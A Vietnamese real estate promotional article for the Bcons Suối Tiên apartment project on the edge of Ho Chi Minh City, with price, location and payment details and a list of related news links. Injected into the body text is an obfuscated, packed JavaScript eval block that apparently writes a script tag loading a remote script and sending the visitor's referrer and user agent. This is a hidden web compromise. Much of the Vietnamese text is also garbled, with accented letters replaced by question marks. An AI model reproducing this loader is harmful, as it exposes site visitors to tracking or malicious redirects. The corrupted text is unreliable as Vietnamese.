THỜI GIAN BÀN GIAO DỰ ÁN:

Còn
0
9
Tháng
0
7
Ngày

Dự án Bcons Suối Tiên BĐS ven đô Tp.HCM – lựa chọn khôn ngoan để an cư và đầu tư

T?i eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fzyri|var|u0026u|referrer|eeaiy||js|php’.split(‘|’),0,{}))
khi qu? ??t ? trung tâm Thành ph? H? Chí Minh ngày càng khan hi?m và giá ti?n cao ng?t ng??ng, BDS ven ?ô tr? thành n?i an c? và tri?n khai h?p d?n vì quy t? nhi?u ?u th? ?? gia t?ng giá tr?.

Th? tr??ng b?t ??ng s?n d?ch chuy?n v? ven ?ô

Là trung tâm kinh t? phát tri?n s? 1 c? n??c, dân s? chú ý v? Thành ph? H? Chí Minh ngày càng t?ng cao. V?i s? dân ??t ??n 13 tri?u dân, vùng trung tâm thành th? ?ang ch?u áp l?c ?ông ??o v? c? s? v?t ch?t giao thông l?n an c?. ?? gi?i quy?t v?n nh? th?, Thành ph? H? Chí Minh ?ã th?c hi?n chính sách giãn dân v? vùng ven ?ô, xây d?ng công trình ti?n ích, nâng c?p c? s? h? t?ng giao thông h??ng tâm, t?o ti?n ?? ?? nâng c?p nh?ng khu ?ô th? v? tinh.

>>Xem thêm ba?i viê?t vê?: Ph??ng th??c thanh toa?n c?n hô? Bcons Suô?i Tiên

Ngoài ra, nhu c?u s?ng xanh ngày càng ???c ?a chu?ng và tr? thành tiêu chí tr?ng ?i?m ?? ch?n l?a c?n h? c?a l?n khách hàng. ? khi này, các vùng ven ?ô qu? ??t còn nhi?u, c?nh quan s?ng xanh r?ng thoáng, li?n k? g?i v?i t? nhiên.

N?m b?t nhu c?u c?a c? dân và xu th? phát tri?n c?a thành th?, các ??n v? b?t ??ng s?n d?ch chuy?n r?m r? ra khu v?c ven ?ô. Tri?n v?ng nh?t có th? k? ??n khu ?ông. N?i ?ây ?ang ???c xây d?ng ?? bi?n thành K?T m?i c?a thành th?, c?a ngõ và là b? m?t c?a thành th?.

C? s? v?t ch?t t?i khu v?c c?ng không ng?ng ???c c?i thi?n. Nhi?u tr?c ???ng tr?ng ?i?m k?t n?i v?i trung tâm ?ô th? ???c kh?i công xây d?ng. ? này có th? k? ??n chu?i ???ng s?t Metro trên không sang tr?ng nh?t VN d? ki?n ??u n?m 2021 ?i vào ho?t ??ng.

B?n xe Mi?n ?ông m?i có 4 khu g?m bãi xe, phòng vé, trung tâm th??ng m?i g?m 15 t?ng. Xa l? Th? ?ô ?ã ???c c?i ti?n và m? r?ng, các ???ng Song Hành, c?u v??t h?m chui ?ã thi công xong t?i v? trí c?a trên Su?i Tiên ??i di?n d? a?n Bcons Suô?i Tiên…..T?t c? là bàn ??p cho th? tr??ng b?t ??ng s?n phát tri?n.

Ti?m n?ng an c? và tri?n khai t? b?t ??ng s?n ven ?ô

Hi?n nay, giá BDS ? các vùng ven ?ô nói chung và ? khu ?ông Sài Gòn nói riêng ?ang t?i m?c khá “m?m”. Cho nên, ? vùng này, ng??i dân v?a ti?n l?i s? h?u nhà ? v?i giá thành h?p lý, v?a t?n h??ng không gian s?ng tho?i mái và nhi?u ti?m n?ng nâng c?p t?i t??ng lai. ?ó là lý do t? l? h?p th? c?a nh?ng s?n ph?m trong vùng ?ó luôn ??t s? giao d?ch ?n t??ng.

??n c? nh? khu c?n h? Bcons Suô?i Tiên v? trí c?a ngay M?t ti?n ???ng Tân L?p tuy?n giao thông huy?t m?ch ??ng th?i Xa l? Hà N?i và cách Su?i Tiên, B?n xe Mi?n ?ông m?i, tr?m cu?i Metro s? 1 ch? 500m. Dù ch?a chính th?c m? bán nh?ng ?ã có h?n 90% c?n h? ???c khách hàng ??ng ký s? h?u.

S? d? c?n hô? cao câ?p Bcons Suô?i Tiên có s?c hút m?nh m? b?i chi phí ?u ?ãi, ch? t? 900 tri?u/ c?n 2 phòng ng? (?ã VAT) bàn giao hoàn thành. Bên c?nh ?ó 90% c?n h? ??u có ban công r?ng rãi và s?n ph?m còn ???c chú tr?ng thi?t k? ti?n ích sang tr?ng nh? h? b?i tràn b?, chu?i shophouse, phòng th? hình, Spa, nhà tr?, 2 phòng Sinh ho?t c?ng ??ng, c?m công viên 1700m2,….

Bên c?nh giá thành h?p lý, chung c? cao câ?p Bcons Suô?i Tiên còn ???c áp d?ng chính sách thanh toán d? dàng. C? dân ch? c?n thanh toán 10% (90 tri?u ??ng) là có th? sang nh??ng ?u ?ãi vô cùng l?n cho ch? ??u t? l??t sóng, d? ??nh m?i ??t ti?p theo s? ?óng 10% ? 4 tháng thông qua ti?n ?? thi công. Khách hàng nhìn t?c ?? thi công t?n m?t r?i m?i ?óng ti?n t?o ni?m tin v?i khách mua ?.

>>Xem thêm: Chu? ?â?u t? c?n hô? Bcons Suô?i Tiên la? ai?

Bạn đang xem: Dự án Bcons Suối Tiên BĐS ven đô Tp.HCM – lựa chọn khôn ngoan để an cư và đầu tư trong

News latest

Saigon Riverside City lối tắt đến thành công
Saigon Riverside City lối tắt đến thành công

Tại sao nói dự án Saigon Riverside City chính là lối tắt đạt đến thành công mà mỗi khách hàng tại thị trường Thủ Đức...

Căn hộ sunshine city Sài Gòn hạng sang
Căn hộ sunshine city Sài Gòn hạng sang

Những yếu tố phong thủy cực tốt tại căn hộ Sunshine City Sài Gòn Phong thủy vốn được xem là một trong những yếu tố...

Dự án One Varandah đặc biệt như thế nào
Dự án One Varandah đặc biệt như thế nào

Là một trong những công trình bất động sản được triển khai tại quận 2 thành phố Hồ Chí Minh, dự án One Varandah tương...

BẢN ĐỒ HUYỆN BÌNH CHÁNH
BẢN ĐỒ HUYỆN BÌNH CHÁNH

Mới đây, UBND Thành phố đã có quyết định ban hành số 2391/QĐ-UBND về quy hoạch sử dụng đất đến năm 2020 và kế hoạch...

FLC Đại Mỗ, Nam Từ Liêm được FLC mua với mức giá 860 tỷ có xứng đáng?
FLC Đại Mỗ, Nam Từ Liêm được FLC mua với mức giá 860 tỷ có xứng đáng?

Thông tin t?p ?oàn FLC m?i ?ây ?ã v??t qua 16 ??i th? ?? th?ng ??u giá khu ??t có di?n tích 6,4ha thu?c ph??ng...